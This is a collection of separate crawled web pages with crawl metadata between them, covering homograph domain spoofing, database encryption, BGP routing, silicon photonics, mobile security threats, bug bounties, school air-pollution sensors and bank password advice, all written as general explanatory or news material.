Forwarded from: William Knowles <wkat_private> http://www.sciam.com/2002/0602issue/0602scicit5.html June 2002 By: Wendy M. Grossman Is this the Web address of tomorrow: ? At the moment, non-Latin alphabets and scripts are not compatible with ASCII, the lingua franca of the Internet also known as plain text. But as of March only 40 percent of the 561-million-strong global online population were native English speakers, according to online marketing firm Global Reach. Work has been proceeding for some time, therefore, to internationalize the system that assigns domain names (sciam.com, for example) to the dotted clumps of numbers that computers use (such as 188.8.131.52). The technical side of things has been managed by the Internationalized Domain Name Working Group of the Internet Engineering Task Force (IETF). In April, VeriSign, the single largest registrar of domain names, claimed to have registered about a million international names. But turning Web addresses into a multilingual forum may open the door to a dangerous new hazard--hackers could set up fake sites whose domain names look just like the ASCII version. One example is a homograph of microsoft.com incorporating the Russian Cyrillic letters "c" and "o," which are almost indistinguishable from their Latin alphabet counterparts. The two students who registered it, Evgeniy Gabrilovich and Alex Gontmakher of the Technion-Israel Institute of Technology in Haifa did so to make a point: they suggest that a hacker could register such a name and take advantage of users' propensity to click on, rather than type in, Web links. These fake domain names could lead to a spoof site that invisibly captures bank account information or other sensitive details. In their paper, published in the Communications of the ACM, they paint scary, if not entirely probable, scenarios. For instance, a hacker would be able to put up an identical-looking page, hack several major portals to link to the homographed site instead of the real one, and keep it going unnoticed for perhaps years. On a technical level, homograph URLs are not confusing. International domain names depend on Unicode, a standard that provides numeric codes for every letter in all scripts worldwide. And at its core, the internationalization of the domain name system is a veneer: the machines underneath can still only read ASCII. According to the proposed standard, the international name will be machine-translated at registration into an ASCII string composed of an identifying prefix followed by two hyphens followed by a unique chunk of letters and numbers: "iesg--de-jg4avhby1noc0d," for example. This string would be translated back into Unicode and compared with the retranslation of the original. So right now anyone using a standard browser can easily see the difference between an internationalized domain name and an ordinary one. This situation, however, is temporary. Technical drafts by the IETF state that users should not be exposed to the ugly ASCII strings, so increasingly users will have little way of identifying homographs. Computer scientist Markus G. Kuhn of the University of Cambridge notes that for users to be sure they are connected to the desired site, they will have to rely on the secure version of the Web protocol (https) and check that the site has a matching so-called X.509 certificate. "That has been common recommended practice for electronic banking and commerce for years and is not affected by Unicode domain names," Kuhn observes. Certification agencies (which include VeriSign) ensure that encoded names are not misleading and that the registration corresponds with the correct real-world entity. But experience shows that the Internet's majority of unsophisticated users "are vulnerable to all kinds of simple things because they have no concept of what's actually going on," explains Lauren Weinstein, co-founder of People for Internet Responsibility. Getting these users to inspect site certificates is nearly impossible. Weinstein therefore thinks that a regulatory approach will be necessary to prohibit confusing names. Such an approach could be based on the current uniform dispute resolution procedure of the Internet Corporation for Assigned Names and Numbers (ICANN), the organization that oversees the technical functions of handing out domain names. But it will require proactive policing on the part of the registrars, such as VeriSign, something they have typically resisted. But are international domain names even necessary? Kuhn, who is German, doesn't think so: "Familiarity with the ASCII repertoire and basic proficiency in entering these ASCII characters on any keyboard are the very first steps in computer literacy worldwide." Internationalizing names might succeed only in turning the global network into a Tower of Babel. *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ================================================================ C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* - ISN is currently hosted by Attrition.org To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail. This archive was generated by hypermail 2b30 : Tue May 28 2002 - 05:13:25 PDT
<urn:uuid:6fa58367-2344-44cf-a13b-9de3beb9fc41>
CC-MAIN-2017-04
http://lists.jammed.com/ISN/2002/05/0164.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00134-ip-10-171-10-70.ec2.internal.warc.gz
en
0.906454
1,092
2.984375
3
Encrypting a database does have a superficial appeal. The rise of native encryption technologies, embedded into the database by the various vendors, have made encryption easier today than ever before. By protecting your data and associated objects intellectual property can be preserved and the sun will always shine. Or will it? Microsoft SQL Server Stored procedures in SQL Server enable a developer to encapsulate functionality into a block of code, which, in turn, can be optimised by the database for very fast processing. The code in a stored procedure can represent a business process or other logic that can easily be commercially sensitive. By default, SQL Server will take this code and store it in a system table called SysComments. If a user can access this table, which is not necessarily difficult, the code can be seen in plain text and therefore read and copied. To prevent this from happening it is possible to encrypt a SQL Server stored procedure using the WITH ENCRYPTION clause. This will encrypt the logic in the SysComments system table and make the stored procedure indecipherable. Note that once a stored procedure has been encrypted neither the object owner or systems administrator can recover the plain language code, so it is imperative that a copy of the unencrypted stored procedure code is kept in a safe place. Well, that is the official line. The harsh reality is that the internet is awash with third party tools that can decrypt SQL Server stored procedures for $100 or so. Does this make the encryption of SQL Server stored procedures a waste of time? Probably not, as encryption will deter the casual observer. ISVs should incorporate suitable clauses in their End User Licence Agreement that forbid reverse engineering of code and I hope the courts will take a dim view of someone trying to break open your intellectual property. Ultimately if someone wants to get your code they will, but why not make it a little more difficult for them? This vendor supports the protection of PL/SQL code using a tool called the PL/SQL Wrap Utility. If you wrap code in Oracle it can still be treated the same as unwrapped code—it is just as portable. There are some limitations to the Oracle Wrap Utility. Specifically names of variables, columns, tables and string and number literals are not hidden by the tool and these will remain in plain view for others to see but at least the code is hidden. Running the Wrap Utility is done from the command line, the file to be wrapped is simply named alongside the name of the new wrapped file. Database Encryption—the downside Like most things in IT, there is always a negative to a positive. If encryption is so great why don't developers use it everywhere—basically encrypt everything unless there is a good reason not to? Unfortunately using encryption can both increase the volume of your database and decrease your system performance. Some encryption algorithms used to encrypt data work on a fixed block size architecture. If the size of the data to be encrypted does not match these block sizes then some algorithms will pad out the blocks with wasted space to make them fit—and bloat your database. A good example is the use of wrapping in an Oracle database. The size of a wrapped procedure can be up to three times the size of the same code unwrapped which in turn will increase the time it takes to install these procedures. Performance can be massively affected if you are using indexed columns that are encrypted. Often this data is the type that makes sense to encrypt as it may be the most sensitive, such as a credit card number. The down side is that when you are adding or changing data the database will need to battle with the encryption algorithm to make the changes. No one ever said database security was easy and a win-win. There will always be instances when the technology that supports the encryption will get in the way of the business objectives of the database. In this case you will need to make an informed view as to what if any data is encrypted in the database.
<urn:uuid:34d459c0-1e2e-40a8-8d88-ca180187fde0>
CC-MAIN-2017-04
http://www.bloorresearch.com/analysis/is-database-encryption-worth-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00438-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914618
813
2.671875
3
BGPv4 is an Exterior Gateway Protocol (EGP) and was introduced in 1995 in RFC 1771 and is now defined in RFC 4271. The major difference from earlier version of BGP and v4 is BGPv4 is classless and supports CIDR. BGP is primarily used to propagate and advertise public networks across the internet. A large majority of Internet communications is made possible by BGP. Autonomous System numbers (AS) are assigned to companies wanting to advertise their networks/ IP ranges to the Internet. AS numbers are controlled and assigned by the Internet Assigned Numbers Authority (IANA) to Regional Internet Registries (RIRs) who then assign specific AS numbers to ISPs or companies requesting an AS number Unlike IGPs, BGP is connection based and uses TCP port 179 to communicate with peers. Since TCP is used, routing via an IGP or static routes must be in place before BGP peering can establish. Since each BGP node relies on downstream neighbors to pass along routes, BGP is considered a Distance Vector Protocol . Each node or makes route calculations based on the advertised routes from BGP peering neighbors. Unlike other distance vector protocols BGP uses a routes AS_PATH to determine best path selection for each route. For this reason BGP is commonly called a Path Vector protocol. Packet Types/Neighbor States Open Message Sent after the TCP connection is established. This message is used to identify the sending router and to specify operational parameters - Open message includes: - BGP version number - AS number - Hold time - BGP ID (highest loopback IP or physical IP if no loopback exist) - Optional Parameters Keepalive Message Sent once a router accepts the parameters in the neighbors open message. Keepalives are then sent periodically. Update Message Sent when route changes are made which include, new routes, withdrawn routes or both. - Update message includes: - Network Layer Reachable Information (NLRI) - used to advertise new routes - Path Attributes - Withdrawn Routes - Note: each update message describes only a single BGP route. A new update message must be sent for each route being added. Notification Message Sent whenever an error is detected between peers . Notification messages always cause the BGP connection to close. - Open Sent - Open Confirm BGP Neighbor States Idle - BGP always begins in the idle state in which it refuses all incoming connections. When a start event occurs the BGP process initializes and starts establishing a BGP connection with its neighbor. - An error causes BGP to transition back to the idle state. The router can then try to automatically issue another start event. Too many attempts of a start event can cause flapping so limitations should be set to limit the number of retries. Connect State - In this state BGP is waiting for the TCP connection to be completed.If the connection is successful then an Open message is sent and the router transitions to the OpenSent state. - If the TCP connection is unsuccessful then BGP continues to listen for TCP connection attempts from the neighbor, resets its ConnectRety timer and transitions to the Active state Active State - BGP is trying to initiate a TCP connection with a neighbor. OpenSent State - An open message has been sent and BGP is waiting to receive an open message from its neighbor. - If there are errors in the open message (incorrect AS number or version etc...) an error notification is sent and BGP transitions back to the idle state. If no errors are seen then a keepalive message is sent. OpenConfirm State - The BGP process is waiting for a keepalive or notification from a neighbor. - If a notification is received or a TCP disconnect is received the state transitions to idle. If the hold timer expires, an error is detected, or a stop event occurs, a notification is sent and the BGP connection is closed changing the state to idle. Established State - BGP connection is fully established with a neighbor and update messages are exchanged with the new neighbor - If any errors are found or the keepalive timer times out a notification message is sent and BGP is transitioned back to idle. Path attributes are what allow BGP administrators to control and manipulate routing updates among peers. BGP path attributes allow you to control what routes are preferred, what routes are advertised to peers and what routes are added to the local routing table. Path attributes fall into 1 of 4 categories: Well-known Mandatory - must be included in all updates Well-known Discretionary – must be supported but may or may not be included in updates Optional Transitive - not required but peer must accept the attribute Optional Nontransitive - not required and can be ignored - Well-known Mandatory - Well-known discretionary - Optional Transitive - Optional nontransitive - MULTI_EXT_DSC (MED) - ORIGIN - Specifies the origin of the routing update. - IGP, EGP, Incomplete (preferred in this order) - Routes learned from redistribution carry Incomplete origins because BGP cannot tell where the route originated. - AS_PATH - Uses a sequence of AS numbers to describe the AS path to the destination. - When a BGP speaker advertises a route to an EBGP peer it prepends it’s AS number to the AS_PATH. When advertising to iBGP peers the AS is not added. - NEXT_HOP - Describes the next-hop router on the path to the advertised destination. The NEXT_HOP attribute is not always the address of the neighboring router. The following rules apply: - If the advertising and receiving routers are in different ASs (external peers), the NEXT_HOP is the IP of the advertising router's interface - If the advertising and receiving routers are in the same AS (internal peers), and the route refers to an internal destination, the NEXT_HOP is the IP of the neighbor that advertised the route - If the advertising and receiving routers are in the same AS (internal peers), and the route refers to a route in a different AS, the NEXT_HOP is the IP of the external peer from which the route was learned - LOCAL_PREF - Used only in updates between iBGP peers. It is used to communicate a BGP router's degree of preference for an advertised route. - When multiple routes to the same destination are received from different iBGP peers the LOCAL_PREF is used to determine the best path. - Highest value takes preference. - Default value is 100 - ATOMIC_AGGREGATE - Used to alert downstream routers that a loss of path info has occurred due to summarization of subnets. - If an update is received with the ATOMIC_AGGREGATE attribute set that BGP speaker cannot update the route with more specific information. Also the attribute must be set when passing the route to other peers. - AGGREGATOR - Provides information about where the aggregation was performed by including the AS and router ID of the originating aggregating router. - COMMUNITY - Used to simplify policy enforcement by setting a community value. - 4 octets are used (AA:NN) where AA represents the AS and NN is an administratively set value. An example would be 65001:70. - Cisco uses NN:AA instead and "ip bgp-community new-format" must be set to use AA:NN - Reserved COMMUNITY values used for policy enforcement - INTERNET - all routes belong to this community by default and advertised freely - NO_EXPORT - routes cannot be advertised to EBGP peers or advertised outside the confederation. - NO_ADVERTISE - routes cannot be advertised to any peer (EBGP or iBGP) - LOCAL_AS - (aka NO_EXPORT_SUBCONFED per RFC 1997) routes cannot be advertised to EBGP peers including peers in other ASs within the same confederation. - MULTI_EXT_DSC (MED) - used to influence routes entering the local AS. - Carried in EBGP updates this attribute allows an AS to inform a directly connected AS of its preferred ingress points. - Lowest value is preferred. - Default value is 0 - MED cannot be passed beyond the directly connected AS. For this the AS_PATH must be manipulated. - By default MEDs are not compared if two routes to the same destination are received from two different ASs - ORIGINATOR_ID - 32-bit value created by route reflectors to prevent routing loops. - The value is the RID of the originating router of a route in the local AS. If a BGP speaker sees it's RID in the ORIGINATOR_ID attribute of a received update it knows a loop has occurred and ignores the update. - CLUSTER_LIST - A sequence of route reflection cluster IDs used by route reflectors to prevent routing loops. - CLUSTER _LIST consist of all cluster IDs a specific route has passed through. If a route reflector sees its own cluster ID in this attribute it knows a loop has occurred and ignores the update. - Administrative Weight - Cisco specific BGP parameter assigned to help prioritize outbound routes. - Local to router only and not communicated out - Weight between 0 and 65,535. The higher the weight the more preferable the route - Weight considered before all other characteristics - Routes generated by local router = 32,768 - Routes learned from a peer = 0 - AS_SET - Used to prevent loops (just like AS_PATH) by listing all ASs traversed (not listed in order) in the route. Used when an aggregate summarizes a route and starts the AS_PATH over. AS_SET is included (with all original ASs) so routers can determine if a loop has occurred. - When AS_SET is included an ATOMIC_AGGREGATE does not have to be included with the aggregate. - Updates are sent when, ASs change within an aggregate and AS_SET is included. Without the AS_SET no update would be sent since it’s an aggregate. Attribute Order of Preference - Adminastrative Weight (Cisco only) - Highest wins - LOCAL_PREF - Highest wins - Prefer route learned locally through IGP - AS_PATH - Shortest path wins - Origin Code - Lowest wins - MED - Lowest wins - EBGP > Confederation EBGP > IBGP routes - BGP NEXT HOP - Lowest IGP metric to next hop wins - BGP Router ID - Lowest wins eBGP and iBGP Exterior BGP (eBGP) is used to setup BGP peering among peers of different autonomous systems. eBGP peering is most common among ISPs and their customers. ISPs also establish peering points with other service providers via eBGP peering. When an eBGP peer advertises routes to its neighboring peer the AS number is prepended to the AS_PATH. If a router receives the same route from multiple BGP peers then the route with the shortest AS_PATH is chosen and added to the routing table. Routers will then only advertise the best route to other BGP peers. An example AS_PATH would be 65001 65010 65111. Using this AS_PATH we can see the route was originated in AS 65111 and was then advertised to 65010 and then again advertised to 65001. To avoid loops, if a BGP peer sees its own AS number in the AS_PATH then it knows a loop will occur and discards the route. Internal BGP (iBGP) is used to setup BGP peering among peers of the same AS. Usually iBGP peers fall inside the same company or organization. iBGP is usually seen in multihomed scenarios and transit ASs which are used to pass BGP routes from one AS to another. When routes are advertised between iBGP peers the AS-PATH is not changes since the routes stay within the same AS. The AS number is not prepended to the AS-PATH until a route is advertised to an eBGP peer. Since the AS-PATH is used by BGP to protect against routing loops iBGP peers are unable to tell if a route advertised from another iBGP peer will cause a loop. To solve this issue iBGP peers do not advertise routes learned from iBGPs peer to other iBGP peers, thus providing loop avoidance within an AS. The problem with the iBGP loop avoidance rule is BGP routes learned on one end of an AS are not fully propagated to routers on the other end of an AS. One of three solutions must be used to fully propagate BGP routes across the AS. - All iBGP peers must be fully meshed and peer with all other iBGP routers within the AS. - By fully meshing all iBGP peers each BGP router will receive updates from all routers in the AS - Unfortunately this is not always possible and does not scale with a growing network - Synchronization must be used and BGP routes must be redistributed into the IGP so the routes can be advertised across the AS. - Most IGPs are unable to handle large BGP tables much less the full Internet BGP table. - Route Reflectors must be established. Route Reflectors are defined in RFC 4456 and used primarily in large autonomous systems to propagate routes to all BGP peers without the use of a fully meshed AS. In larger networks it is impractical to setup full mesh peering between all peers within the As. Route Reflection provides a means to centralize iBGP peering to a single router or group of routers known as route reflectors. All routers (known as clients) within the AS peer with a centralized router (route reflector or server). Normally iBGP routers do not advertise routes learned from iBGP peers internally but route reflectors are the exception to this rule. Route reflectors advertise routes to both iBGP and eBGPs peers thus allowing iBGP learned routes to propagate to all peers within an AS. A group of route reflector(s) and clients is known as a cluster. If multiple route reflectors exist within a single cluster then the cluster name must be defined on each route reflector. The key benefit to using route reflection over other techniques such as Confederations is route reflection does not need to be supported by all routers in the cluster or AS. Route reflection just needs to be supported on the route reflectors or servers. Clients do not need any additional configurations to join a cluster. Clients are specified on each route reflector servicing the cluster. - Client peers – routers who are a member of the cluster. - Non-Client peers – routers who are not a member of the cluster Route reflectors will treat each route differently depending on how a route is received. There are three rules followed by route reflectors. - Locally originated routes and routes received from EBGP neighbors are propagated to all BGP peers (internal and external). - Routes received from a client are propagated to all BGP peers (internal and external). - Routes received from an iBGP non-client peer are propagated to all EBGP peers and all IBGP client peers. Route Reflection Design When designing your BGP network for route reflection you need to consider the location of the route reflectors in comparison to all client peers. Generally routers centralized to the network and are able to peer with all neighbors should be used as route reflectors. For example, in a star topology the hub router will be used as the route reflector. If it is not possible to have a single centralized route reflector then multiple route reflectors should be used. Multiple route reflectors should also be considered for redundancy in the event of a router failure. For large networks you might also consider breaking down your network into multiple clusters. Router reflectors can be clients of other route reflectors. This will allow you to setup a hierarchal network of clusters. A good example would be to create a separate cluster for each city or geographical area and then each route reflector is a client for the back bone cluster. Route reflection can also be used alongside Confederations to improve control over routing updates across the network. AS-path (Filter List) Halabi, Sam and McPherson, Danny (2000). Internet Routing Architectures, 2nd Edition,. Cisco Press. ISBN Ciscopress ISBN 1-57870-233-X
<urn:uuid:bd45fde3-2086-4d6e-b3bc-285d51788fa6>
CC-MAIN-2017-04
http://www.networking-forum.com/wiki/BGP
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00346-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896397
3,506
3.671875
4
Silicon photonics is in the spotlight again, being pitched by researchers at the University of Colorado Boulder, the Massachusetts Institute of Technology and Micron Technology Inc. as a potential Moore’s Law extender. The technology of silicon photonics refers to using light, instead of electrical wires, to enable silicon-based transistors to communicate on a single chip. The technique could lay the groundwork for computers that are remarkably fast, cost-effective and energy-efficient. The project is headed up by CU-Boulder researcher Milos Popovic, an assistant professor of electrical, computer and energy engineering. Popovic and his team developed the technique, which employs two different optical modulators, structures that detect electrical signals and translate them into optical waves. The major benefit to this particular method is that it can be fabricated with standard CMOS processes already in use by the industry. The approach addresses the main stumbling blocks to current transistor designs, energy and heat. Because it takes a lot of electricity to turn transistors on and off, there is excessive heat buildup. The heat buildup means that additional electricity must be expended to cool the device. Furthermore, as transistor sizes shrink, the number of wires occupying such a small area of space leads to “cross-talk.” The multicore/manycore design was essentially a workaround to this problem but this technique is limited by communication between microprocessor cores, which is also energy-intensive. Optical communications circuits are dramatically more energy efficient than electrical wires. A single fiber-optic strand can carry a thousand different wavelengths of light at the same time. This allows multiple communications to take place simultaneously in a small space with no cross talk. The Internet and the majority of phone lines already rely on optical communications technology, but in order to be economically feasible for microprocessors, vendors need to be able to use the same fabrication process and foundries that produce the current generation of microprocessors. This integration of photonics and electronics is what’s necessary to get buy-in from the microprocessor industry, according to Popovic. “In order to convince the semiconductor industry to incorporate photonics into microelectronics you need to make it so that the billions of dollars of existing infrastructure does not need to be wiped out and redone,” he added. Popovic and his colleagues at MIT have demonstrated that this is indeed possible. Two papers published in August in the journal Optics Letters (http://dx.doi.org/10.1364/OL.38.002729 and http://dx.doi.org/10.1364/OL.38.002657) with CU-Boulder postdoctoral researcher Jeffrey Shainline as lead author describe an optical modulator that is compatible with a current manufacturing process known as Silicon-on-Insulator Complementary Metal-Oxide-Semiconductor, or SOI CMOS. This is the same process used to manufacture cutting-edge multicore microprocessors such as the IBM Power7 and Cell, which is used in the Sony PlayStation 3. The research team also detail a second optical modulator that could be created with another popular chip-manufacturing process, called bulk CMOS, currently used for memory chips and most high-end microprocessors.
<urn:uuid:22f6be33-273e-4378-af08-e3375b5a3b6e>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/10/08/breakthrough-for-photonic-electronic-microchips/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00464-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932039
672
3.625
4
Ethical Hacking and Security Ethical hacking, or authorized virtual attacks on information systems designed to uncover vulnerabilities, speaks to Chinese war authority Sun Tzu’s ancient aphorism about understanding one’s enemy. “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle,” he said. Because having insights into the tactics and strategies of one’s opposition is such an effective means to defend against them, ethical hacking methodologies have been working their way into more and more IT security training and certification programs. One of these is the International Council of E-Commerce Consultants’ (EC-Council) Certified Ethical Hacker (CEH) credential. In this month’s Security community feature, Sanjay Bavisi and Sangeetha Thomas of the EC-Council discuss the CEH program as well as ethical hacking in general. Click here to find out more about both.
<urn:uuid:e8b831a5-6a4a-459e-8aab-dab5edabec9c>
CC-MAIN-2017-04
http://certmag.com/ethical-hacking-and-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00098-ip-10-171-10-70.ec2.internal.warc.gz
en
0.926436
231
2.71875
3
Like viruses and spyware that can infect your PC, there are a variety of security threats that can affect mobile devices. We divide these mobile threats into several categories: application-based threats, web-based threats, network-based threats and physical threats. Downloadable applications can present many types of security issues for mobile devices. “Malicious apps” may look fine on a download site, but they are specifically designed to commit fraud. Even some legitimate software can be exploited for fraudulent purposes. Application-based threats generally fit into one or more of the following categories: - Malware is software that performs malicious actions while installed on your phone. Without your knowledge, malware can make charges to your phone bill, send unsolicited messages to your contact list, or give an attacker control over your device. - Spyware is designed to collect or use private data without your knowledge or approval. Data commonly targeted by spyware includes phone call history, text messages, user location, browser history, contact list, email, and private photos. This stolen information could be used for identity theft or financial fraud. - Privacy Threats may be caused by applications that are not necessarily malicious, but gather or use sensitive information (e.g., location, contact lists, personally identifiable information) than is necessary to perform their function. - Vulnerable Applications are apps that contain flaws which can be exploited for malicious purposes. Such vulnerabilities allow an attacker to access sensitive information, perform undesirable actions, stop a service from functioning correctly, or download apps to your device without your knowledge. Because mobile devices are constantly connected to the Internet and frequently used to access web-based services, web-based threats pose persistent issues for mobile devices: - Phishing Scams use email, text messages, Facebook, and Twitter to send you links to websites that are designed to trick you into providing information like passwords or account numbers. Often these messages and sites are very different to distinguish from those of your bank or other legitimate sources. - Drive-By Downloads can automatically download an application when you visit a web page. In some cases, you must take action to open the downloaded application, while in other cases the application can start automatically. - Browser exploits take advantage of vulnerabilities in your mobile web browser or software launched by the browser such as a Flash player, PDF reader, or image viewer. Simply by visiting an unsafe web page, you can trigger a browser exploit that can install malware or perform other actions on your device. Mobile devices typically support cellular networks as well as local wireless networks (WiFi, Bluetooth). Both of these types of networks can host different classes of threats: - Network exploits take advantage of flaws in the mobile operating system or other software that operates on local or cellular networks. Once connected, they can install malware on your phone without your knowledge. - Wi-Fi Sniffing intercepts data as it is traveling through the air between the device and the WiFi access point. Many applications and web pages do not use proper security measures, sending unencrypted data across the network that can be easily read by someone who is grabbing data as it travels. Mobile devices are small, valuable and we carry them everywhere with us, so their physical security is also an important consideration. Lost or Stolen Devices are one of the most prevalent mobile threats. The mobile device is valuable not only because the hardware itself can be re-sold on the black market, but more importantly because of the sensitive personal and organization information it may contain.
<urn:uuid:3b8451be-f22a-4a44-b6e7-648da99f5f06>
CC-MAIN-2017-04
https://www.lookout.com/know-your-mobile/what-is-a-mobile-threat
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00006-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914137
711
3.015625
3
The idea that you might pay someone else to keep quiet a vulnerability while you fix it may seem a bit backward to some in computer security. It would also seem to invite attacks on infrastructure. It’s no surprise, then, that many companies with technological products don’t have bug bounties. A bug bounty is a fee that is paid out whenever a hacker discovers a legitimate bug and co-ordinates with the company in order to recieve the fee rather than selling the exploit or announcing it to the world. It’s a technique that has come into the public spotlight by being implemented at such prestiegeous places as Facebook and Google. But WHY? Why does it work? For many hackers, the security vulnerability is the means and the end — that is, they hack in order to find a security vulnerability and once one is found, they know that the service is vulnerable. Some hackers inevitably choose to sell these or trade these in underground markets, but many wish to see them fixed (perhaps the hacker uses the service or understands the potential for damage should it be abused). Many will then attempt to contact the company and disclose the vulnerability. Should the company drag its feet or if the hacker is feeling particularly onery, the vulnerability will be publicly disclosed (typically referred to as a “grey hat” method of disclosure). Having a bug bounty program lets computer security folks know: - You understand security processes and the motives behind finding vulnerabilities - That your company is dedicated to fixing the problem - That you wont shoot the messenger or try to stifle them - That they can earn more respect and money by working WITH you than AGAINST you It’s a psychological change that can help garner you more security and more respect in the security community as an organization that is dedicated to secure software/hardware. That way you won’t end up with anonymous trying to wage Internet battle with your company. Below is a list of bug bounties offered by various companies: In the end it’s easier to pony up cash for vulnerabilities and fix them before they become security headaches or,worse, go unnoticed for long periods of time while they are used in advanced attacks. Encourage the behavior you want to see in the security community by implementing a bounty program of your own. Companies like Facebook and Google have already handed out tens of thousands of dollars for their bug bounty programs at between $500 and $1337 dollars a pop.
<urn:uuid:2f627396-3bb3-43db-9b77-a3c14424ddd5>
CC-MAIN-2017-04
http://www.fedcyber.com/2012/04/17/bug-bounty-programs-encourage-responsible-disclosure/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00244-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937619
505
2.796875
3
Schoolchildren in London will be carrying more than just their books – but now IoT sensors to measure air pollution in the area. Children and teachers from East Barnet school in North London have been fitted out with sensors that will collect and process air pollution data from both inside the classroom and on routes to and from school. The 16 children and teachers have been given CleanSpace Tags, portable air pollution sensors created by Drayson Technologies. The initiative makes East Barnet School one of the first schools in London to accurately measure and address the issue of air pollution by mapping data in real time. IoT sensors and a real-time heat map Drayson Technologies has partnered with Sustrans on the project alongside teachers to set up the 16 CleanSpace Tags, ten of which will also be placed inside the school to monitor indoor pollution levels. The carbon monoxide data collected from the tags will be fed into a time-lapse heat map that will show the pollution levels, in real time. The findings will be used to provide a clear picture of air pollution in and around the school. The data collected from the IoT sensors will show the times of day that pollution levels are worst, and will become the first step to informing changes that can be made to overcome unnecessary pollution. On top of this, the results will be used to provoke change in how students and teachers travel to and from school and to promote sustainable modes of transport. Lord Drayson, chairman and CEO of Drayson Technologies, said that until now we have been unable to get a detailed understanding of what the air quality is like in, and around, our schools. “This project will not only enable us to see how much pollution these pupils are exposed to, it will help us identify ways we can reduce this by addressing behaviour that might be contributing to pollution levels,” he said. Stuart Owen, head of Science at East Barnet School said the project would “enable us to understand the quality of the air inside, and around our school, and help us to devise a strategy to ensure our pupils have a minimal exposure to pollution.” Emanuele Angelidis, CEO of Breed Reply, told Internet of Business that there are a lot of solutions that are emerging “designed to help governments and big business reduce pollution and achieve environmental targets, as well as maximise efficiency.” “Rather than simply selling hardware such as sensors it will be the long-term services – data management and analysis – that they offer to customers that will be profitable,” he said.
<urn:uuid:60ad022e-b508-4f9c-aeee-b7a9a77c5570>
CC-MAIN-2017-04
https://internetofbusiness.com/london-school-use-iot-pollution/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00244-ip-10-171-10-70.ec2.internal.warc.gz
en
0.95269
525
2.84375
3
TORONTO, ONTARIO--(Marketwired - Oct. 8, 2013) - Editors' Note: An image is associated with this press release. October is Cyber Security Awareness Month, an international effort to educate consumers about cybercrime, and the Canadian Bankers Association (CBA) is reminding Canadians about what banks are doing to enhance cyber security and encouraging Canadians to bank safe and foil the fraudsters. Banks have extensive security measures in place to protect their customers from fraudulent activity in their bank and credit card accounts, including monitoring transactions looking for unusual activity, verification questions to ensure that it is the customer using online banking, and moving to more secure chip and PIN (personal identification number) debit and credit cards. These efforts have been able to prevent criminal activity and help Canadians safely do their banking and pay for purchases. "There are also important and simple steps that customers need to take to prevent fraud, and one of the most important things is to choose secure PINs and passwords," said Maura Drew-Lytle, Director of Communications at the Canadian Bankers Association. "This is a requirement set out in your banking agreements and if customers have taken the appropriate steps, then they will be protected from fraud losses by the banks' zero liability policies." Tips on choosing secure online passwords and PINs Each bank will have its own requirements about choosing secure passwords and PINs, so it is best to check with your bank's online access agreement, bank account agreement or credit cardholder agreements, but there are some general guidelines to keep in mind. When choosing online passwords, verification questions and credit and debit card PINs, avoid choosing something that would be easy to guess or information that could be obtained by others. You must not use: - Your name or that of a close relative - Your birth date, year of birth, telephone number or address, or that of a close relative - Your bank account, debit card or credit card number - A number on any other identification that you keep with your debit and credit cards in your wallet, such as a driver's licence or social insurance number - A password or PIN used for other purposes Other secure banking tips - Never share your debit or credit cards, PINs and passwords with others, not even family members. - Shield your PIN when entering it. Don't write it down, memorize it. - Report lost or stolen cards immediately. - Always check your monthly bank and credit card statements, or check your accounts online regularly. Make sure all the transactions are yours. - Never give out your card number over the phone or Internet unless you are dealing with a reputable company. The only time you should give it is when you have called to place an order. - Protect your home computer - make sure that you install anti-virus, anti-spyware and Internet firewall tools purchased from trusted retailers or suppliers. Keep these programs enabled and continuously updated to protect your devices against malicious software. Information on choosing secure PINs and passwords is outlined in the account and cardholder agreements and electronic banking agreements. These documents are provided to customers when they open a bank or credit card account or when they sign up for online banking. They are also readily available on request at bank branches or on bank websites. It is very important that customers read and understand these agreements before choosing their PINs and passwords. To find out more about frauds and scams, how banks protect customers and how customers can protect themselves, sign up to receive the CBA's fraud prevention tips by e-mail at www.cba.ca/fraud. About the Canadian Bankers Association The Canadian Bankers Association works on behalf of 57 domestic banks, foreign bank subsidiaries and foreign bank branches operating in Canada and their 275,000 employees. The CBA advocates for effective public policies that contribute to a sound, successful banking system that benefits Canadians and Canada's economy. The Association also promotes financial literacy to help Canadians make informed financial decisions and works with banks and law enforcement to help protect customers against financial crime and promote fraud awareness. www.cba.ca. Follow the CBA on Twitter: @CdnBankers Watch videos: Youtube.com/CdnBankers Follow the CBA on LinkedIn To view the image associated with this press release, please visit the following link: http://media3.marketwire.com/docs/msc_pinsafety_en.jpg
<urn:uuid:7c450f22-ba93-4c83-abb0-85ebc805d0fe>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/are-your-passwords-pins-secure-its-cyber-security-awareness-month-bank-safe-foil-fraudsters-1839193.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00548-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933304
912
2.53125
3
